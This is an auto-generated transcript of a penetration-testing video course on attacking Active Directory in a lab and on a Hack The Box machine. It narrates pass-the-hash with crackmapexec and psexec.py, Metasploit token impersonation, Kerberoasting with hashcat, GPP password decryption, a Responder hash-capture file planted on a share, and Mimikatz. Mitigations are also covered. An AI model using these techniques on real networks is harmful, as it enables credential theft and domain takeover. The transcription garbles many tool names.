second half and we can copy this and we're going to use crack map exec to try to break it so or at least try to pass it so what we can do is we could say something like crack map exec same situation here make sure that crack Mecca zek has SMB after it before you run the command as shown in the video this is just a small update to the command line and a change that crack map as deck hasn't made give the range that we're going to test again so 57024 and then we're going to say username and this one is Frank Castle like this so because we have the space in there I'm going to go ahead and just put that in quotations and then we're going to do a capital H for hash paste that in there and the last thing we want to note is that this is local so dash dash local is important to put in here okay one more small change that has come from crack map exec here this is what your syntax should look like right this second with your hash being here instead of the place of this hash dash dash local dash auth is the new syntax in the video I show you dash local make sure you add the dash auth just to make sure this runs smoothly so again one small change from crack SEC make sure you have local author make sure you have SMB in the front the rest should stay the same in this situation go ahead and hit enter and see it's going to try to pass this around the network and gain access now it doesn't say that it's pwned here which is interesting but we do have the user light up green which is an indicator that this might have actually worked in the attack so if we see pound or we've seen a green one here like a green plus sign that's a good indicator that this has worked pone is a guarantee the Green Arrow or the green plus sign here is a good chance but this has resulted in false positives in the past we do know that it worked and it attempted to pass it along the rest of the way here it was unsuccessful as expected which is okay but again passing this hash around the network you never know what you're gonna find you never know this could light up green for all of these with pwned all the way down the list and then guess what we have every single machine and I've had this happen in countless assessments and if you want a story time quick story time there was a assessment that I was up against that was using something called privilege access management which we're going to talk about really quick in the next video but that's a great mitigation to these sorts of attacks because what happens is a user goes in and they have to check out their domain account so there are tools called like cyber Arc or psychotic that can be used where you go in you type a password you check out your domain account and your domain account password is really long it's some crazy complex 15 to 30 character password you utilize that for eight hours or so and then guess what when you check it back in that password rotates to a new password so you only know this crazy complex password for eight hours it's impossible to capture LMR or any kind of hash that's ntlmv2 and try to crack it but guess what I was able to use SMB relay on an assessment dump out the Sam hashes just like this I saw administrator on there I just went and copied this put it into crack map exec just like I did here fluid around the network and it owned everything in cyber Arc privilege access management that's not cheap we're talking million dollar software that they had focused on security and their domain controller went down in seconds because they weren't thinking about their local admin accounts local admin accounts are so important especially if you're reusing these passwords it's gonna hurt you so bad so keep this in mind as another form of attack utilizing these local hashes and another thing to do as well is you can put this into PS exec and get a shell out of it if you want you can use PS exec.pi to do this so for example if we go to PS exec and we just say dash dash help you'll see in here that there is a place for hashes so you can utilize the whole hash to authenticate instead of utilizing a password so we can do something along the lines of this PS exec dot pi and we'll just say something like we'll say Frank Castle like this and we won't give it a password and we'll just say at and this will be 192.168 57.141 and then we'll say hashes and then we need the whole hash for this one so we need the LM hash and the NT hash and if we look here this is the LM hash and the second part is the NT hash you need the entire hash for PS exec to work here so let's go ahead and paste that and we'll hit enter and we can see while this user was able to authenticate here we were able to request the share we weren't able to get any admin access via this one so even though this user has access to this machine we're still not able to get a writable share where we can upload and get a shell and to prove concept here we can try it on another computer say 42 where we know we don't have Privileges and you can see there's a login failure so there's a difference here but this is just another thing that you can do you can attempt to get a shell with this local user without ever having to use PS exec or know the password or anything so just building upon this if you pass this password around the network and this password works all over the place then your next move would be to do this setup here put your hash in and then try to fire it and get a shell this is a quick way to own a domain controller for example if the domain controller is allowing something like this or that user is valid on that domain controller so from here we're going to go ahead and talk mitigation strategies and then we'll move on to some more fun attacks in active directory let's talk mitigation for past the hash past the password now mitigating this completely is difficult but as an administrator you can make my life very difficult as an attacker so one thing to note is if you limit your account reuse for example Frank Castle being a local Advent on multiple computers when we pass the password that got us into multiple machines we only had access to one machine now we've laterally moved across the network to another machine and who knows what we're going to find because it's a whole different set of hash dump when you saw we dumped the the hash we can also start looking through files on computers looking for anything interesting you're going to see some more attacks that we're going to find here and there's different attacks that we can pull off as a user so there's things that one machine might not have for us but once we move laterally to another machine then guess what it's a whole new ball game and then that might open up something we didn't see before that allows us to escalate into domain admin so if we do not have local admins on machines or reusing them then guess what it's going to be really hard for us to do that again you should also limit who is that local administrator right least privilege we've talked about this time and time again here the strong passwords come into play as well not so much for the passing of the hash but passing of the password if we're never able to crack the entail mb2 hash in the first place and get a shell on these machine means then we're never going to be able to actually perform these attacks and get here in the first place so utilizing strong passwords in your network is big big lastly we talked about in the last video privilege access management you can make my life very difficult in a situation where you're using privilege access management in that story that I talked about where I took down that Network that had that million dollar privilege access management right they were using cyber Arc and they had that tool I took them down because they were using bad local admin passwords and they were reusing them had they been using good local admin passwords and they weren't reusing them I would have failed on that assessment hands down no doubt about it but because of that they had a big weakness there and it can just bypass these million dollar systems however these systems are important very very important so if you can utilize it if you have the funds to utilize privilege access management in your system in your environment please do it it's really worth it so that's it for this so now we're gonna move on to what are called token personation attacks and these are really fun you're going to see why in the next video our next attack type is called token impersonation so what are tokens well you could think of tokens basically as cookies for your computer there are these temporary Keys allow you access to a system or network without actually having to provide your credentials so like a cookie now there are two types there's what is called a delegate or an impersonate token so for the delegate token that is used when you log into a machine or you have a remote desktop for example or if you have an impersonate token if you're having like a network drive attached or some sort of domain logon script that's where you would see an impersonate token in this course it's much easier to just demonstrate a delegate token because all we have to do is log into a machine and then that token exists so we're going to do that so let's take a quick overview before we go into the live demonstration of why this is bad and what this really is so here we have our user and we have we've gotten a shell and we're in a shell in interpreter we've loaded a tool here called Incognito which is built into Metasploit and we're just going to list our tokens of our user here Marvel F Castle appears we're on the Frank Castle machine now we're going to go ahead and try to impersonate that user so we're going to say is impersonate token Marvel F Castle kind of like this we'll go into a shell and guess what we're Marvel Frank Castle cool so let's go ahead and try to run something do not worry about what this is right now but we're going to use invoke Mimi cats and this is a Powershell script that is trying to dump hashes okay we're trying to uh do an LSA dump here and dump all the hashes off the domain controller and what's going to happen is it's going to say hey access denied you do not have this kind of access okay but what if for some reason the user was a domain admin and that token was available now you can see the domain admin has logged into this machine the tokens now available and we're going to impersonate this token so we're going to say impersonate token Marvel administrator we go into a shell and you can see that Marvel administrator is now available to us we try running this command again and guess what it succeeds this time allowing us to dump all the hashes in the network including the Kerberos ticket granting ticket hash which we haven't covered yet we'll get there but this is a big win so the difference is that if you can navigate to a machine and you find a token of a domain administrator that you can impersonate you have domain admin there are a lot of things that you can do with that domain admin so you want to bounce around and look for these token impersonation attacks and really see if you can't find that domain admin on a machine so this is what I was talking about in the last video when it came down to moving laterally and there's always potential difference in a new machine so we might go from machine one where we're Frank Castle and there's nothing great we passed that password pass that hash around we get onto machine two where we're on Spider-Man's machine and there is the administrator just sitting there with a token and then we impersonate that token and then we are now a domain administrator we can act on their behalf so pretty cool feature here so let's go ahead and do a live demonstration of this so we can get Hands-On and then we'll talk about mitigation strategies now to perform this attack with token impersonation we're first going to have to use Metasploit so let's go ahead and just type in msf console we're going to load this guy up and then we're going to go ahead and search for PS exec we're going to get a shell on the Frank Castle machine or The Punisher machine so I'm just going to say use exploit Windows SMB PS exact because I have it memorized here and we're going to say options and then we're going to set our our host which should be the Punisher machine mine's at 57 141 we're going to set the SMB domain which is going to be marvel.local set SMB pass as password one set SMB user as F castle and let's go ahead and show targets once you have that all set up so I'll say show targets and I'm going to do a native upload so we'll set Target of two I'm going to type options here and I'll stall verbally just for a second so you can catch up if you need to but we're just making sure that everything is checked with our boxes we've got the right our host we've got the right domain password user native upload last thing we're going to want to set the payload here because it's going to try to attack with a x86 payload so we're going to go ahead and just say windows x64 and we'll save interpreter reverse TCP options set the L host here to eat zero and now if we type options one more time it should look good we've got 192.168 57 139 is the L host that is us okay let's try to run this and boom interpreter session right off the bat that's what I love to see okay so now we have the meterpreter session we could do all the fun stuff that we already know about right we can do a hash dump we could say get uid we can make sure we're system we could say sysinfo get the system info uh we're on the right machine right architecture right everything this is great now there are a few things that we can do in here one is we can go ahead and we can load a tool and if you load and double tab there's a few different things that we can use in here now we can load the tool that we're going to use which is incognito we can also use kiwi which is a tool similar to mimikats which is made for dumping passwords and we're going to talk about mimikats here very very soon we could also load Powershell I love this feature because sometimes if we get into a shell and we try to load Powershell like if we go into a shell we just say Powershell whatever execution policy bypass and try to run that it doesn't always run this one's nice and neat for us it's not always like that so we're going to go ahead and cancel this or exit out of this channel but we can load Powershell into this and inject Powershell as well so these different features here are really nice uh but for this one I'm gonna go ahead and unload the Incognito feature and if we type help the last thing that we loaded is always at the bottom so if you ever want to see that down here Incognito commands now I've had Incognito come up on interviews before so this is a special one to note and just to understand what token impersonation is and why it's important so we have the ability here to impersonate a token once we have a token impersonated we can try to add uh add a user add group add local groups we can do all kinds of fun stuff for this example we're just going to go ahead and just try to impersonate a user okay and I'm going to go ahead and just list the tokens and I'm going to do a dash U you could do it by Dash U or Dash G for groups I always like to do it for dash U and you can see sitting on this machine here is Marvel administrator so if we want to impersonate this person all we have to say is an impersonate token and then we're going to go ahead and just say Marvel administrator just like that you want two backslashes because of character escaping now we've impersonated this user go ahead and type shell who am I and you see now we are Marvel administrator so one thing to know let's control C exit out of this we can go ahead and say um say like you want to run hash dump now it's going to have issues it's going to say access is denied because we're not actually running as the system of the machine so if you're ever in this situation all you have to do is type rev to self so you're going to revert to your old self who you came in as and then now you can run hash dump again and it'll work so let's do one more proof of concept here you saw that the administrator was available and for you it might have been your other user right it's whoever is logged in currently I didn't instruct you with who to log in as so on my Windows 10 machine right now I've got the Marvel administrator logged in let's go ahead and just sign in with fcastle and let's just put in password one get Frank all logged in here and get your other user logged in whoever it is if you had somebody you impersonated go ahead and impersonate a different user here so now we can come into this again and we can say list tokens Dash U for user and guess who just showed up Frank Castle why this is a delegate token remember delicate tokens are on login or RDP sessions so we had to log in on this computer now we've got this token this token exists until the computer is rebooted we can impersonate this user until the computer is rebooted so we can go ahead and say impersonate token and say Marvel F castle like this should work go ahead and say shell who am I guess what now we're Frank Castle this one is so cool I love this attack so that's it I just want you to get the feel for what you're capable of doing we just took a user that was just happened to have left a token behind and this happens a lot think of an account where or a server that you might log into or get access to and there is a domain admin who logged into that computer and servers don't get rebooted that much so if there's a domain admin on that computer and they don't reboot very often that token's sitting there until they reboot so it's just moving laterally machine to machine until you find that way to escalate and this is a potential way to escalate so that's it we're going to move on to talk about the mitigation strategies for this and then we're going to talk about kerberosting which is one of my favorite attacks so I'll go ahead and catch you in the next video quickly let's talk about the token impersonation mitigation strategies so with this we can limit user and group token creation permissions that one's a little tricky it will not fully prevent everything I don't believe not in my opinion the better idea here in the beating down uh you know some of the repetition that we're going to have here account tiering very important your domain administrators should be logging into the machines that they need to access which should only be domain controllers if for some reason that domain administrator logs into a user computer or a server and that user computer or server gets compromised guess what we can impersonate that token if we compromise the domain controller what do we need to impersonate the token for we've already compromised that domain controller so yes we could still do a token impersonation attack on the domain controller but you know there's no point there but if we you know somewhere else in the network on a user or a server a different server then we can compromise that become domain average Avent and leverage that so that's one two local admin restriction comes into play yet again if users are not local admins on their computers we cannot get a shell on that computer with their account that prevents us from getting onto the computer and utilizing this kind of attack so we need to have a count tiering we need to have local admin restriction in the network and when I say account tiering as well it should be noted that users typically have two accounts when we have account tiering you might have Bob and then you might have Bob Dash a so Bob will have his everyday regular user account and then when he wants to go access the domain controller he's going to log in as Bob Dash a which stands for admin and he's only going to log in on the domain controller and isolate his accounts with this tiering so that way anywhere else that Bob has access or privilege to you're not going to be able to get to the domain controller if you compromise Bob's regular user account and typically the domain admin accounts have a longer password policies and are more strict with their permissions so something to think about in terms of defeating this and it's just beating a dead horse with a lot of this right like just a lot of repetition on some very simple policies and if these policies are in place which in most networks they're not then you can stop an attacker with a lot of attacks so that's it for that we're going to go ahead and move on to kerberosi now so I will see you over in the next video let's talk Kerber roasting so in order to talk kerberosting we have to understand how Kerberos itself works now there is this great great infographic here that will tell us how these things work so here we have a domain controller okay and this domain controller is also known as a key distribution center and we can call that a KDC here we also have our user now our user is going to need to authenticate to the domain controller when they do that they're going to say hey I want to request what is known as a ticket granting ticket I'm going to provide my ntlm hash and I'm going to request that ticket from you now the domain controller is going to send back the ticket granting ticket and it's going to encrypt that ticket with the Kerberos ticker granting ticket hash okay what's important here is this KDC is holding the keys right so we have to authenticate with the KDC that sends it back here and now we have a ticket granting ticket how did we get this ticket granting ticket we supplied an ntlm hash what does that mean we have a username and a password that's it any valid user doesn't have to be admin doesn't have to be anything any valid user gets this ticket this is how Kerberos works this is the authentication so we have Frank Castle we have password one we have a valid ticket granting ticket so from here now let's say we have an application server this could be SQL this could be antivirus it could be whatever you want the application to be we just have a service that we're trying to access so this service here has what is called an SPN that is a service principal name and that's going to come into play here in just a second but in order to access this service we have to first request a ticket granting service ticket or this is a TGs okay so we're going to request this TGs and how do we request this well we present our TGT so we've already got our TGT our ticket granny ticket we're going to request a service ticket from the server well the server knows the server account hash right and it's going to encrypt that and send it back the server does not know if we the KDC or the server here does not know if we have access to the server or not so it's just going to provide back to us the TGs with the server account hash this is where kerberosyn stops however let's continue in order to authenticate to that server in the real world what we would do is we would present that TGs to the application server and that would then decrypt it using its own server hash and it would say yes you have authentication you are the user that I is allowed on this or no and then it's going to send back and say yes or no we don't need to ever send that out this is not important it's important to understand what's happening and why this happens but the important part to understand here is we have a valid user account which gives us a ticket granting ticket steps one and two with that ticket grinding ticket then we can request a service ticket for a service that service ticket is going to be encrypted with the servers account hash why does that matter well guess what it's a hash we can decrypt the hash we can try to crack the hash so we can run a tool it's called getuserspns.pi guess where it's from impack it impact it's awesome and we just say marvel.local Frank Castle password one we specified the domain controller IP and we request so we're going to request this service ticket right and guess what's going to happen we're going to get this ticket granting service ticket here it has the hash here that's encrypted with and we're just going to copy this hash and try to crack it so we're going to put this into hashcat this big long hash so we get back and we're going to crack it pretty easily so that's what we're gonna do again quick refresher just to go back we have our ticket granting ticket we request that from the KDC we get that because we have a known user account does not have to be a domain administrator account known user account so once we get credentials we can attempt Kerber roasting from there we request this ticket granting service ticket and it's going to send that back to us and it's going to say here you go I'm going to encrypt it with the service hash and then we don't ever have to present here we just take it and we try to crack that so let's go ahead and do this Hands-On and you'll see this come up again a couple times so let's go ahead and move on to the next video let's pull off this kerberosting attack so we're going to use get user spns so get user sbns you should be able to Auto tap complete that and now again all we need is that username and password from a domain account so marvel.local we're going to say f Castle here and password one we need to know the domain controller IP so we're going to specify that with dc-ip like this and we're going to say 192.168 57 140 or whatever your IP address is and do a dash request there you go so already very quick is how this happens it just comes down and it provides us the hash here so we requested that TGs again and we can take a look at this and you can see that what came down was a SQL service and remember we did set that up and here it's going to give us this kbr5 TGs hash so go ahead and copy this and what we're going to do is we're going to put this I'm going to put this into my hashes four same one I've been using and save it foreign so we could do a quick hashcat to find the module we could do dash dash help and we can do a graph on Kerberos like this and we are after Kerberos 5 ticket granting service TGs so 13 100 here so what we'll do is we'll come into here and we'll just say similar to before hashcat 64.exe module of 13 100 hashes 4 dot text and then we'll do a rock u.txt go ahead and hit enter after putting a capital O to optimize and this should just take a second here as well so we're going to let this run and then I'm going to give you a little Spiel on this password so this password is going to crack and it's going to crack as my password one two three four or one two three pound right and this is a what 2 6 10 14 character password so remember how I said that even though 14 character is like the minimum I recommend these passwords that use common wordage and just looks like this it's it's not safe this is a 14 character password and it fell so easily it's in rocky.text Rocky was the base crack list right a good crack list can still crack a 14 character password and like I said I've cracked a 19 character password before because it was a Bible verse so if it's something well known or easily guessable like this and uses dictionary words chances are it's going to fall so I just wanted to harp on that but the bigger point is we have found the SQL service password this is the SQL service domain password here and we already knew what it was because we discovered it earlier but this is a domain admin account because it was set up incorrectly your service account should not be domain admin accounts but that happens all the time so we look for these accounts with kerberosting we try to crack these passwords and then we utilize these to access the domain controller access new areas even lateral movement but this is a lot of the times considered vertical movement because it gets us right into a domain controller when these have incorrect permissions set up so that's it this is one of the most common attacks that you will see in a network once you get a credential at all you can try Kerber roasting and see if you can't get to a password crack and leverage that so let's go ahead and talk about mitigations before we move on to some other attacks all right mitigation so just a couple options here now Kerber roasting this is a feature of windows right we're abusing a feature so there's nothing that you can really do to defend against this except having strong passwords for your service accounts very strong passwords not 14 characters like we cracked like 30 characters or more you know the longer the better on top of that lease privilege do not make your domain accounts domain administrators or do not make your service accounts domain administrators right least privilege here too often we see service accounts running as domain administrator and too often we see service accounts running with weak passwords combine those two and you're going to have a bad day as a network administrator so that's it pretty simple on the mitigation strategy so from here we're going to talk about an older but yet still relevant attack and this attack is called see password attack or a gpp attack so we'll go ahead and see you in the next video when we talk about this and revisit hack the Box up next on the list is the gpp or group policy preferences attack also known as ms-14025 so a quick overview the group policy preferences allowed admins to create policies using embedded credentials now these credentials were encrypted and they were placed into an XML document and they were stored in this type called C password now the C password was encrypted as I said and the key to this encryption was accidentally released and so therefore we can decrypt it now this has been patched in ms14025 and prevents issues going forward however it does not prevent previous issues so what that means is if an admin has stored a group policy preference embedded credential before the patch was implemented then this will still display a credential to us now most of the time these credentials are domain admin credentials and will allow us access to domain admin accounts this is not going to come up that often but it is still something that you should be checking for because there are a lot of Server 2012 machines out there for example that this was not patched on or has been patched but this was running on previously so what we're going to do is we're going to cover how to do this and it's actually kind of difficult to set up in the lab environment so we're going to do is we're actually going to use hack the box to attack this before we do that I am going to reference an article here now this article is by rapid7 and I'm gonna paste it down below but this kind of shows you what gpp is and what the uses were and you can see here that a password was stored and if we scroll down quickly we can see that the password was stored in the sysball so as long as you have a user account and we can read that sysball and it says here any domain user this is why this is a post exploitation attack once we have a domain user we can attempt to read this sysfall it's stored here in the C password you can see it all we have to do is run a gpp decrypt which is built into Cali and it'll decrypt the password now there is this SMB enum gpp here this is a Metasploit module and I really want you to write this down this is how you would check for this so you would say you have a um a shell in Metasploit you can background that shell run the SMB enum gpp or you can run the post on the gpp and see if you can enumerate this and gain a username and password similar to this before I have seen this come up in previous assessments and this is always something that you should be checking for even if it's older so from here we're going to utilize hack the Box there's a machine on there called active we're going to use that and it's got two great examples of what we just learned on here so I'm going to challenge you once we get to the next video on solving half of the equation we'll walk through the first half and talk about this gpp and see a live example of it so I'm going to go ahead and catch you over in the next video when we explore this gpp attack so we're going to walk through a box called active now active relates to active directory it's one of my favorite machines on hack the Box because of this so active lives at 10.10.10.100 and I want you to go ahead and boot up your machine log into hack the box if you're going to follow along so this is going to be kind of a two-part video the first part I'm going to show you how we scan and enumerate this machine what we're looking for when it comes to gpp and then the second part is just going to be a bonus we're going to actually have to priv ask this machine and we're going to figure out how we're going to prevent this machine based on an attack that we've already done in the past in this course so once you're all loaded up here go ahead and go into your terminal and get scanning so this one lives at 10.10.10.100 and I'm just going to make this a quick scan and map and then we'll just do I'm actually going to do a T5 on 10 10 10 100. and this should pull back pretty fast on the ports what we're going to be after and so what we're going to do here is you can see that we are running a domain so when when we scan against a domain controller we expect to see something like 53 open and that could be a router as well but we also expect to see 88 open because 88 is Kerberos and it's running Kerberos on that Port so that kind of tells us along with ldap and ldap secure or ldap SSL so now we kind of have an idea that this is probably a domain controller based on all the things that we're seeing here so on top of this we have 445 open so we want to enumerate 445 on this machine and we're going to take a look at 445 for this attack why are we looking at 445 because the attack involves utilizing SMB and in SMB when you connect to it there are sysfall folders right let's take a look this will be easier so we'll just say SMB client and we'll do a dash L to list this out and I'll go ahead and just say 10.10.10.100 we'll take a quick look at this and we'll try Anonymous connection here and you can see that there are different folders there's the admin a c folder IPC net logon replication sysfall and users now we can try to connect to each one of these but it's going to deny us access to all of these however there is this replication folder where we do have Anonymous access as uh no user right so we're just going to say replication enter this in and we have access to this machine and I'm kind of speeding along here just so that we can get through this and we can actually work on the uh the machine itself with the exploit itself as opposed to working on methodology and why we're doing this the exploit is more related to SMB than it is enumerating so this isn't a walk through box more so than showing you the exploit so the way sysfile works is it's storing this groups.xml file and in that group so XML file is where you find that c password and this is where that gpp that group policy preferences came into play and so let's go ahead and turn I'm going to turn prompt off which is just going to if I could type it which is just going to tell us not to prompt when we uh tell it to download all of our files so what I'm going to say is I want recurse on so recurse on means it's going to download all the files that I tell it to so if the ls here you can see there's a bunch of different folders and files in here and there's actually you can see there's a groups.xml and this is kind of what we're going to be interested in um so what we're going to do is we're just going to say mget star like this and this is going to get all the files and as we see these come across we can know if we're interested in anything we see this gpe to ini we see groups.xml a registry.policy GPT template.inf so we're really interested in this groups.xml and this is something to Note 8 groups.xml is the file you're looking for when it comes to gpp now you don't have to do this again there is the gpp enumerate when it comes to interpreter or if you want to use Powershell there are Powershell scripts out there as well I believe one is called invoke gpp and that'll search through uh through the sysfall for you as a user and look for this exploit so in this situation I should note too that we had Anonymous access to this replication folder that's not a realistic scenario this is most definitely a post exploit scenario where we have a user account once we have that user account we'll be able to access that sysfall folder okay so from here we see that we have this groups.xml so what I'm going to do is I'm actually going to go to files and we are here in active.htv it should download to that and we can just kind of look where it went so it went policies three one B so we're gonna go to 31b folder and then we're going to go to preferences or machine preferences groups and there's the groups.xml so this is why I also did the M get star is so that we can see what came through and we don't have to just sit there in CD and navigate around just to see if there's something in a folder or not in a folder it's much easier to sit download everything and look through what comes through so when we come into here and we open this up you can see now that we have our C password on top of this we have active.htb which is the domain name and we have service ticket granting service TGs that should ring a bell right ticket Grinding Service so this is the TGs account so what are we going to do we're going to copy this bad boy here and we can go right into let's just go ahead and go to a new tab make this bigger and we could just say something along lines of gpp decrypt paste that in just like that and look what happens gpp still standing strong 2K 18. so that's the password look how long this password is it doesn't really matter right what matters here is that we are able to reverse or decrypt this gpp because we know the encryption so here we now have a username and a password we have active.htv service TGs and the password of gpp still standing strong 2K 18. so I'm going to pause the video here or I'm going to actually cut the video off this is going to be considered part one part two is going to be a challenge to you we can now go log in with this account and you're going to find that when you log in with this account you are actually a lower level user this account is not a high level user this is not a system okay so because this is not a system level user what is an attack that we can run on this to try to escalate and you can use anything and everything that has been taught to you so far once you think through it think if you find the answer go ahead and attempt it if you're just watching and not following along with the hack the box that's okay as well just go ahead and meet me in the next video and we'll cover this so Brief Review as well we are after the gpp right the groups.xml this is an older exploit we're targeting Windows 2012 Server 2012 usually with these and you're going to see these in environments when you when you come across it it's going to look pretty much like what I showed you it's going to be something like this where you either get the username and the password right off the bat with interpreter or you're going to run something along the lines of invoke gpp and you're going to try to search for that as well via Powershell module but this is what you're after and this is what you're decrypting here with that password so now we've got a username and password how are we going to abuse this I love this machine so I'll meet you over in the next video with the solution part two let's do this so here we are we have our user account and our password now what can we do well we can try to get on an account we can say something like uh we can say what PS exact dot pi and we can say active.htb and then it was actually forward slash service TGs like this and then we can just copy this password paste it here and say at 10.10.10.100. and see what happens nothing's writable okay so we have valid user credentials but not writable well what is an attack we talked about very very recently that we can use with user credentials and the TGs might have tipped It Off what about kerberosting remember the TGs is the service ticket well when we say service ticket we think well maybe that's Kerberos thing maybe we need to get a a service here so that's kind of a tip and so we can do the get users spns right and we can say again we could say active.htb and we say service TGs just like this paste this one more time and we'll do DC IP of the same box address and then we'll just say request and then look what happens this comes through so let's go ahead and just make this a little bit bigger I'll actually blow this up completely and now you can see that we have a service ticket here so I'm going to copy this service ticket and I'm actually going to open up my hashcat folder live here open up hashes four and we have our old one I'm just going to paste that in save this ticket and I'm going to open up a command prompt and we're going to do this together so I'm opening up my command prompt and we're going to try to crack this so I'm going to CD into my desktop slash hash cat and then it's hashcat 64.exe a module of 13 100 hashes4.text and rock you dot text with the capital O just like that this should be all familiar Refreshers I'm going through just a little bit faster hit enter and let's see what happens should only take a second and look what came through Ticketmaster 1968 is our password we have successfully kerberosted this account and you can see here that it is the administrator account oh that's lovely I love when the administrator is a uh is a service account so now let's just do administrator like this paste this in here and try PS exec.pi one more time it found the writable share of admin and now we have who am I Authority system hostname active or DC and we took down this box easy as that so hopefully this was a fun challenge hopefully you actually tried it um if not just get your wheels spinning if you have a credential and it doesn't have to be a uh it doesn't have to be a credential that can get you onto a machine we could have a situation where this is a low level user or they just don't have local admins on their machine so PS exec SMB exec wmi exec none of those are working but we can try attacks like kerberosting on the network or we can try attacks like the gpp password attack and see if we can't find stored credentials somewhere so these are great attacks that we can try that are just default Windows kind of stuff so from here we're going to go ahead and talk a little bit about Mimi cats we'll talk uh some couple different ways we can utilize it in the network and wrap up this section so we're almost through active directory I feel sad it feels like it's coming to a close but I'm very excited to talk walk through mimicat's next so let's go ahead and move on to that video okay so I want you to imagine a scenario where you have compromised a user and this user has any sort of share access so any sort of file share access we can utilize that access to capture more hashes via responder go back and try to crack those hashes get the passwords and possibly get a different user or maybe a user with more access so this does require a compromised user account or potentially a an open file share so if you happen to find an open file share for some reason you can access it and put something in there or put a file in there that works as well so what we're going to do is a play on what used to be called an SCF attack the SCF attack still kind of works but it's not as good as what is called a URL attack and it's the same premise same idea I'm going to put a link in the description below or the resources you can go read up on these attacks and see there's all kinds of different authentication attacks out there where you can utilize social engineering like you can use Microsoft Word you can use Outlook and different ways to get people to open files or certain things that will then trigger a hash back to you in responder so what we're going to do is we're going to first create the file and then we're going to come back and run responder and test it out so I am in my Windows 10 machine I'm logged in as Frank Castle in here I've got my a notepad open so if you want to open up a notepad and type this out you're more than welcome to if you just want to watch a demonstration that's fine too if you want to pause the video go ahead and type this out absolutely fine so basically what we have here is internet shortcut URL blah working directory blah none of this really matters as long as the syntax is here the only thing that truly matters okay is this IP address this IP address is going to be your attacker IP so what we're going to do is we're going to point this at us so that way we can capture the hash what's going to happen here is we're going to save this file and we're going to save this file to a share so remember we created that hackme share in our Hydra DC so I went ahead and put this in here so what you do is you go file save as once you've got it all typed out and I'll also put this in a code format down below as well so if you want to just copy and paste it you can do that but what you want to do is you can come in here and you can just click on all files and say you wanted to name it something we can name it with quotes around it we'll just call it like at test and then you could call it dot URL okay you want to have two things here the at symbol or a uh a squiggly will work as well like a little attilda like that and you want to also have the dot URL at the end of it the attilda or the at symbol puts this at the top okay so what's happening is when the user comes and navigates to this share folder this will be at the top of the folder so at the top of the folder it ensures that it loads if they have a large file share and they have to scroll through it and it doesn't load then they might not see the file doesn't trigger doesn't automatically send the hash we want to automatically send the hatch we want to place this at the top now what you can do with this is you can create something in here instead of writing something maybe it's like a finance folder it could just be something where it's just called like Q4 financials or something that would be relevant to the folder of where it's at if it's like a printing share it could just be like looks like something else that would be um you know a PDF or print print job or something out there so you want to kind of social engineer a little bit but if you drop this file nobody's really going to do anything if we open it up it's not going to really do much it's just going to go to whatever you could make this go to Google if you wanted to like you could change the directory to whatever you wanted to um so with that being said I'm going to go ahead and just cancel this but what can happen here is we just want to save this in this directory okay so all said and done we've got it saved I'm on the Frank Castle machine I'm going to go to this PC get out of that folder and then we're going to open up responder and all we're going to do is just do responder we can do a dash I eat zero and then a dash V for verbose hit enter we're listening here's our IP address attacker machine we're going to come in we're just a user navigating to a folder no big deal oh my gosh all these hashes just came through it's the same thing repeated don't worry about that but you should have captured a hash here and what is this ntlmv2 okay so you can copy this and you can send this off and what else can you do with this you can relay it as well so if you're in a situation where you want to try relaying maybe get access somewhere else that is an opportunity for you as well so this is a cool little feature where you can just dump a a quick file in a file share literally just a few words or a few lines in a text document essentially and this will cause hashes to load like crazy for you so something to think about when you compromise a machine and go from there so that is it for this video so it's very late here and one thing you don't know is that I record my videos at night so I work during the day I spend some time with my wife and then I find that anywhere from 10 o'clock to about 3 A.M is the prime time to record videos because the traffic on my street is insane well I'm telling you all this because I'm a little bit tired and this is going to be my second time now recording this set of videos on Mimi cats because I forgot to turn my microphone on so um forgive me for this but we're gonna go through it a second time so it should be more well polished so here we are we're talking about Mimi cats and let's go ahead and just Dive Right In what is meme cats well Mimi cats is a tool that we can use to view and steal credentials now it steals these credentials that are stored in memory and it can do a lot of Nifty Things Beyond still-in credentials it can generate Kerberos tickets and it can leverage a lot of attacks just a few attacks and that's kind of a joke but credential dumping past the hash overpass the hash pass the ticket golden ticket silver ticket now we're not going to cover all these in this course that starts getting very very deep and here in a couple of videos I'm going to give you resources on where you can go find information on this and how you can get better and better on some of these things but for now my only recommendation is just to cover what I think is important for again for an interview and then the more about this that you can learn about these extra attacks that you're seeing here then the better off you're going to be in your interview but I don't want to overwhelm you with Advanced Techniques that's going to just possibly leave you confused so we're going to keep it with the basics for now and then you can feel free to dive deeper once you have more comfortability in this topic so before we move on I do want to bring up the GitHub so go ahead and go to the GitHub page here for mimicats and just go ahead and Google GitHub meme cats and you should be brought here to this now mimikats is made by a gentleman named Benjamin delpe he's out of France so Mimi Katz I believe means cute kittens in French or something like that cute cats you might trigger an unsafe website because Windows does not like this most antiviruses do not like this and this is made to dump credentials on Windows right so there is a cat and mouse game that's going on right now with Windows and I'm going to show you how to utilize this tool we're going to talk about some strategies with it and we're going to play around with it the only caveat that I'm going to say is it's going to work here and now for the video by the time that you watch this and you download it there's a possibility that a patch on Windows might break it and then they have to update the patch on mimikat side and it's kind of a back and forth game but as of right now it's working and this is a tool again that is going to get caught you can see already unsafe website if you just download this and upload it to a machine chances are it's going to get picked up there are other tools out there that can utilize this one is called invoke Dash mimicats is a Powershell tool now you can either run that on disk meaning that you can upload that to a computer or you can run that via what's called IEX which is a way to just download files via Powershell and you can download and execute without ever actually touching the disk those are some Advanced strategies or just thinking more to the next steps that you might want to start looking into other strategies too are obfuscation and hiding that you're actually running mimikats now again as I said earlier in the course I can show you how to do that and how we do it nowadays but it's just going to become outdated it's this cat and mouse game and it changes all the time so I'd rather show you what the tool can do what it's capable of and let you do this research a little bit on the outside and learn what more attacks are out there last thing to point out so it says here that it is a well-known tool to extract plain text passwords extracts hashes PIN codes Kerberos tickets and it does all the attacks we talked about plus a lot more if you scroll down just a little bit come here to this I don't want to build it or if you don't want to build it binaries are available because this is in a sln file so you'd actually have to compile this we're just going to go ahead and click this if you're on edge it will report it so go ahead and just disregard this and right here we are currently on this 2019 uh November 11th or November 25th so go ahead and just download that you may have to download this um you may have to disable Defender if you download it directly to your machine or your antivirus my suggestion is to download it directly to your domain controller so go ahead and put this on the domain controller so from here on out what we're going to assume is we're going to assume that we have compromised a domain controller and we're going to talk about what we can do once we compromise it why we're doing that and what some attacks are that we can use for persistence specifically a golden ticket and what a golden ticket is capable of so let's go ahead and meet in the next video we actually explore what we can do with this tool and then we'll kind of take it from there okay so I am now on the domain controller and I have Mimi cats and the the three files that were in the x64 folder of the zip just extract it here to the downloads and I'm just going to go ahead and go into a command prompt and something I should point out too let me 